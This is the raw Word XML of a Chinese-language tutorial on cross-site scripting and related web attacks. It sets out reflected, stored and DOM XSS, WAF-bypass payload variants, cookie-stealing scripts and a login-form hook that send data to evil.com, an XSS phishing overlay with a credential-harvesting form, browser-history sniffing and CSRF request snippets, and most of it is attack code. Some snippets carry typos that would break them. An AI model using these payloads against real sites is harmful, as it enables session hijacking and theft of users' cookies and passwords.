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940" w:leftChars="0"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XSS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一</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.XSS的种类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(1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>反射型XSS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如果一个WEB应用程序使用动态页面传递参数向用户显示错误信息，就有可能会造成一种常见的XSS漏洞。一般情况下，这种页面使用一个包含消息文本的参数，并在页面加载时将文本返回给用户。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例如，通过程序参数输出传递的参数到HTML页面，则打开下面的网址将会返回一个消息提示：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"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fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://fovweb.com/xss/message.php?send=Hello,World!" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://fovweb.com/xss/message.php?send=Hello,World!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000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  <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>输出内容：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Hello,World!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pP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在原程序的URL的参数为，替换为我们用来测试的代码：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"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fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://fovweb.com/xss/message.php?send=&lt;script&gt;alert(‘xss’)&lt;/script&gt;" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://fovweb.com/xss/message.php?send=&lt;script&gt;alert(‘xss’)&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/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页面输出内容则为：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&lt;script&gt;alert(‘xss’)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr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当用户在用户浏览器打开的时，将会弹出提示消息。由于这种漏洞需要发送一个包含了嵌入式JavaScript代码的请求，随后这些代码被反射给了发出请求的用户，因此被称为反射型XSS。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(2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>存储型XSS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存储型跨站可以将XSS语句直接写入到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"http://www.2cto.com/database/" \t "http://www.2cto.com/article/201601/_blank"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数据库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中，因而相比反射型跨站的利用价值要更大。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  <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这里提供了一个类型留言本的页面。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521200" cy="142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这里在Message框输入跨站语句“alert('hi')”，以后任何人只要访问这个留言页面，就可以触发跨站语句，实现弹框。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(3)DOM XSS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DOM XSS是基于在js上的。而且他不需要与服务端进行交互，像反射、存储都需要服务端的反馈来构造xss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客户端的脚本程序可以通过DOM来动态修改页面内容，可能触发DOM型XSS的属性：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="C00000"/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document.referer属性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(上一个页面单击到这个页面的url)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="C00000"/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window.name属性</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="C00000"/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location属性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(当前页面的url)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="C00000"/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innerHTML属性</w:t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documen.write属性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客户端源代码</w:t>
      </w:r>
    </w:p>
    <w:p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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p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var a=document.URL;</w:t>
      </w:r>
    </w:p>
    <w:p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document.write(a.substring(a.indexOf(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>“a=”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)+2,a.length));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/script&gt;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恶意链接</w:t>
      </w:r>
    </w:p>
    <w:p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fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.bug.com/index.asp?a=&lt;script&gt;alert(‘xss’)&lt;/script&gt;" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://www.bug.com/index.asp?a=&lt;script&gt;alert(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‘xss’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000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客户端源码</w:t>
      </w:r>
    </w:p>
    <w:p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&lt;a href=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>”http://www.bug.com”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;bug&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p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document.write(document.referrer);</w:t>
      </w:r>
    </w:p>
    <w:p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&lt;/script&gt;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恶意链接</w:t>
      </w:r>
    </w:p>
    <w:p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fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.bug.com/index.asp?#&lt;script&gt;alert(‘xss’);&lt;/script&gt;" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://www.bug.com/index.asp#&lt;script&gt;alert(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‘xss’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>);&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000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客户端源码</w:t>
      </w:r>
    </w:p>
    <w:p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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p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document.wirte(document.location.href);</w:t>
      </w:r>
    </w:p>
    <w:p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&lt;/script&gt;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恶意代码</w:t>
      </w:r>
    </w:p>
    <w:p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http://www.bug.com/index.asp#&lt;script&gt;alert(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‘xss’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)&lt;/script&gt;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sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>二．常见的绕过WAF（Web应用防火墙）</w:t>
      </w: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(1)利用html标签的属性值执行XSS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很多html标记中的属性支持Javascript:[code]伪协议的形式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(href,background,value,action等)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href="javascript:alert('XSS');"&gt;aa&lt;/a&gt;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(2)空格回车TAB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利用空格，回车和TAB键绕过限制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href=”javasc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ript:alert(‘XSS’);”&gt;aa&lt;/a&gt;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href=”javasc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ript:alert(‘XSS’);”&gt;aa&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000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(3)对标签属性值进行转码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ascii码编码&amp;#[十进制](&amp;#9==&gt;TAB,&amp;#10==&gt;换行符,&amp;#13==&gt;回车符)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&amp;#x[16进制](&amp;#x9==&gt;TAB,&amp;#xa==&gt;换行符,&amp;#xd==&gt;回车符)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/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&lt;a href=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>javascript:alert(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>);”&gt;aa&lt;/a&gt;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&lt;===&gt;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href=”javascrip&amp;#116&amp;#58alert(‘XSS’);”&gt;aa&lt;/a&gt;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(4)产生自己的事件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&lt;img src=”#” onerror=”alert(‘XSS’)”/&gt;</w:t>
      </w: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(5)利用css跨站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&lt;div style=”width:expression(alert(‘XSS’));”&gt;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&lt;style&gt;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body{background-image:expression(alert(‘XSS’));}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&lt;/style&gt;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&lt;link rel=”stylesheet” href=”http://www.evil.com/attack.css”&gt;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&lt;style&gt;@import url(http://www.evil.com/attack.css);&lt;/style&gt;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(6)扰乱过滤规则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href=”javascript:alert(0);”&gt;aa&lt;/a&gt;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&lt;===&gt;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HREF=”javaScRipt:alert(0);”&gt;aa&lt;/A&gt;大小写混淆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&lt;===&gt;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href=javascript:alert(0);&gt;aa&lt;/a&gt;不用引号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&lt;===&gt;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&lt;a/href=”javascript:alert(0);”&gt;aa&lt;/a&gt; /代替空格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&lt;===&gt;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href=”javas/**/cript:alert(0);”&gt;aa&lt;/a&gt;/**/会被忽略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(7)拆分跨站法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把跨站代码分成几个片段，然后再使用某种方式将其拼凑在一起执行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标题一:&lt;script&gt;z=’&lt;script src=’;/*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标题二:*/z+=’http://www.test.c’;/*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标题三:*/z+=’n/1.js&gt;&lt;\/scirpt&gt;’;/*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标题四:*/document.write(z)&lt;/script&gt;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href=”#”&gt;&lt;script&gt;z=’&lt;script src=’;/*&lt;/a&gt;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href=”#”&gt;*/z+=’http://www.test.c’;/*&lt;/a&gt;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href=”#”&gt;*/z+=’n/1.js&gt;&lt;\/scirpt&gt;’;/*&lt;/a&gt;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href=”#”&gt;*/document.write(z)&lt;/script&gt;&lt;/a&gt;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&lt;===&gt;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&lt;script&gt;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z=’&lt;script src=http://www.test.cn/1.js&gt;&lt;/script&gt;’;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document.write(z);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&lt;/script&gt;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三．cookie欺骗（cookie回话攻击）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获取cookie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document.cookie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设置cookie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document.cookie=’cookieName=cookieValue;expirationData;path’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Domain ---------- 设置关联cookie的域名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Expires ----------- 过期时间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HttpOnly ---------- 禁止JavaScript读取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Path ------------- 关联到cookie的路径，默认为 /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Secure ----------- 指定cookie需要通过https传递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保存在本地的cookie通常是某种验证信息（用户名与密码），虽然经过加密的，但窃取的cookie向某个指定服务器提交且能成功通过验证，叫做cookie欺骗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xss脚本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&lt;script&gt;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document.location=”http://www.evil.com/cookie.asp?cookie=”+document.cookie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&lt;/script&gt;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&lt;img src =”http://www.evil.com/cookie.asp?cookie=”+document.cookie /&gt;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&lt;script&gt;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New Image().src=”http://www.evil.com/cookie.asp?cookie=”+document.cookie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&lt;/script&gt;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当无法获取cookie（httpcookie），则直接获取用户名与密码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&lt;script&gt;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Form=document.forms[“userslogin”];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Form.onsubmit=function(){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var iframe=document.createElement(“iframe”);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iframe.style.display=”none”;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iframe.src=”http://www.evil.com/get.php?user=”+Form.user.value+”&amp;pass”+Form.pass.value;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document.body.appendChild(iframe);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}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&lt;/script&gt;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四．会话劫持</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default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指攻击者利用xss劫持了用户的会话（sessionid）去执行某些恶意操作（或攻击），这些操作往往能达到提升权限的作用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/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五．网络钓鱼</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default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xss跨站脚本最大特性是能够在网页中插入并运行JavaScript，不仅能劫持用户当前会话，同时还能控制浏览器的部分行为，这种基于xss的钓鱼技术被称为xss phishing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/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(1)构建钓鱼链接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fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.bug.com/index.php?s=&lt;script" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://www.bug.com/index.php?s=&lt;script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> src=”http://www.evil.com/xss.js”&gt;&lt;/script&gt;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xss.js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document.body.innerHTML={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‘&lt;div style=”position:absolute;top:0px;left:0px;width:100%;height:100%;”&gt;’+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‘&lt;iframe src=”http://www.evil.com/phishing.html” width=100% height=100% /&gt;’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};</w:t>
      </w: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(2)复制并修改登录页面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&lt;form method=”post” action=”http://www.evil.com/get.php”&gt;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&lt;input type=”text” name=”username” /&gt;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&lt;input type=”password” name=”password”/&gt;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&lt;input type=”submit” name=”login” value=”submit”/&gt;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&lt;/form&gt;</w:t>
      </w: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(3)get.php获取用户名与密码，并重定向到正确的页面</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/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六．xss history hacking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利用链接样式与getComputedStyle()技术。来获取用户访问过的链接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a:link{color:#FF0000}    //未访问的链接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a:hover{color:#FF00FF}  //光标悬停在链接上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a:active{color:#0000FF}  //被选择的链接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a:visited{color:#00FF00}  //已访问的链接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getComputedStyle是一个可以获取当前元素所有最终使用的CSS属性值。返回的是一个CSS样式声明对象([object CSSStyleDeclaration])。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getComputedStyle("元素", "伪类");第二个参数“伪类”（如果不是伪类，设置为null）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getPropertyValue方法可以获取CSS样式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>声</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>明对象([object CSSStyleDeclaration])上的属性值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> ;    getProopertyValue(‘属性值’)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&lt;ul id=”visited”&gt;&lt;/ul&gt;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&lt;ul id=”notVisited”&gt;&lt;/ul&gt;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&lt;script&gt;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var website={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“www.qq.com”,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“www.baidu.com”,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“www.163.com”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};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for(var i=0;i&lt;website.length;i++){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var link=document.createElement(“a”);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link.id=”id”+i;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link.href=website[i];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link.innerHTML=website[i];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document.write(“&lt;style&gt;”);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document.write(“#id”+i+”:visited{color:#FF0000}”);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document.write(”&lt;/style&gt;”);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document.body.appendChild(link);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var color=document.defaultView.getComputedStyle(link,null).getPropertyValue(“color”);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document.body.removeChild(link);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var item=document.createElement(“li”);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item.appendChild(link);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if(color==”rgb(255,0,0)”){</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="84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document.getElementById(‘visited’).appendChild(item);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}else{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="84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document.getElementById(‘notVisited’).appendChild(item);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}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}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&lt;/script&gt;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七．CSRF(Cross-Site Request Forgery)跨站点请求伪造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CSRF攻击能劫持终端用户在已登录的web站点上执行非本意的操作，简单的说，攻击者透过盗用用户身份悄悄发送一个请求，或执行某些恶意操作，CSRF的过程非常隐秘，受害人甚至无法察觉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&lt;img src=”http://www.bug.com/?command”&gt;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&lt;script src=”http://www.bug.com/?command”&gt;&lt;/script&gt;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</w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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&lt;iframe src=”http://www.bug.com/?command”&gt;&lt;/iframe&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000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&lt;script&gt;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var foo=new Image();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foo.src=”http://www.bug.com/?command”;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&lt;/script&gt;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&lt;script&gt;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var post_data=”name=value”;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var xmlhttp=new ActiveXobject(“Micrsoft.XMLHTTP”);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xmlhttp.open(“POST”,’http://www.bug.com/file.ext’,true);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xmlhttp.onreadystatechange=funciton(){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if(xmlthhp.readystatus==4&amp;&amp;xmlhttp.status==200)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alert(xmlhttp.responseText);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}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xmlhttp.send(post_data);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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&lt;/script&gt;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八．sandbox(沙箱)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sandbox的作用是防止恶意软件在用户的计算机上安装木马和病毒，并严格限制客户机的访问，例如google的浏览器chrome就使用了沙箱技术，以隔离JavaScript的执行，html的解析，以及恶意插件的运行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同源安全策略：防止JavaScript跨域访问其他对象，同域指：同协议，同域名，同端口，而iframe却能跨域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九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sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>常见的编码方法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firstLine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default"/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</w:rPr>
        <w:t>URL编码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Url中只允许包含英文字母</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">【 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>a-zA-Z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 】</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、数字</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">【 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0-9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 】</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">【 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-_.~</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 】</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4个特殊字符以及所有保留字符</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">【  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">! * ' ( ) ; : @ &amp; = + $ , / ? # [ ] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 】,所以其他字符需要URL编码。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保留字符:冒号用于分隔协议和主机，/用于分隔主机和路径，?用于分隔路径和查询参数，等等。还有一些字符（!$&amp;'()*+,;=）用于在每个组件中起到分隔作用的，如=用于表示查询参数中的键值对，&amp;符号用于分隔查询多个键值对。当组件中的普通数据包含这些特殊字符时，需要对其进行编码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URL编码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对于ASCII字符，采用%+ASCII（16进制），对于非ASCII字符，采用%+UTF8(16进制)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JavaScript中提供了3对函数用来对Url编码以得到合法的Url，它们分别是escape / unescape, encodeURI / decodeURI和encodeURIComponent / decodeURIComponent。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下面列出了这三个函数的安全字符（即函数不会对这些字符进行编码）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars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escape（69个）：*/@+-._0-9a-zA-Z</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars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encodeURI（82个）：!#$&amp;'()*+,/:;=?@-._~0-9a-zA-Z</w:t>
      </w:r>
    </w:p>
